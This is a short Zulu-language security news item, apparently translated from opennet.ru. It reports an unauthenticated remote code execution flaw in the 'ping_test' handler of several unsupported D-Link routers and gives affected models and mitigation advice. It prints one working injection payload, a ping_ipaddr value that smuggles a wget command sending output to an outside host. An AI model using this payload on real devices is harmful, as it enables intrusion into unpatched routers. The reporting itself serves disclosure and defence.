Kumarutha angenawaya e-D-Link ubuthakathaka obuyingozi (), okukuvumela ukuthi wenze ikhodi ukude ohlangothini lwedivayisi ngokuthumela isicelo esikhethekile kusibambi se-"ping_test", esifinyeleleka ngaphandle kokuqinisekisa.
Kuyathakazelisa ukuthi ngokusho kwabathuthukisi be-firmware, ucingo lwe-"ping_test" kufanele lwenziwe kuphela ngemuva kokuqinisekiswa, kodwa empeleni lubizwa kunoma yikuphi, kungakhathaliseki ukuthi ungene ngemvume ku-interface yewebhu. Ikakhulukazi, lapho ufinyelela isikripthi se-apply_sec.cgi futhi udlula ipharamitha ethi “action=ping_test”, iskripthi siqondisa kabusha ekhasini lokuqinisekisa, kodwa ngesikhathi esifanayo senza isenzo esihlotshaniswa ne-ping_test. Ukuze kusetshenziswe ikhodi, kusetshenziswe okunye ubungozi ku-ping_test ngokwayo, okubiza insiza ye-ping ngaphandle kokuhlola kahle ukulunga kwekheli lasesizindeni se-inthanethi elithunyelwe ukuze lihlolwe. Isibonelo, ukushayela insiza ye-wget futhi udlulisele imiphumela yomyalo we-“echo 1234” kumsingathi wangaphandle, vele ucacise ipharamitha “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ukuba sengozini kuqinisekiswe ngokusemthethweni kumamodeli alandelayo:
- I-DIR-655 ene-firmware 3.02b05 noma ngaphezulu;
- I-DIR-866L ene-firmware 1.03b04 noma ngaphezulu;
- I-DIR-1565 ene-firmware 1.01 noma ngaphezulu;
- I-DIR-652 (alukho ulwazi mayelana nezinguqulo ze-firmware eziyinkinga ezinikeziwe)
Isikhathi sokusekela kulawa mamodeli sesivele siphelelwe yisikhathi, ngakho-ke i-D-Link , engeke ikhiphe izibuyekezo ukuze isuse ubungozi, ayincomi ukuzisebenzisa futhi yeluleka ukuthi esikhundleni sazo kufakwe amadivayisi amasha. Njengendlela yokuvikeleka, ungakhawulela ukufinyelela kusixhumi esibonakalayo sewebhu kumakheli e-IP athembekile kuphela.
Kamuva kwatholakala ukuthi usengozini futhi amamodeli e-DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 kanye ne-DIR-825, izinhlelo zokukhulula izibuyekezo ezingakaziwa okwamanje.
Source: opennet.ru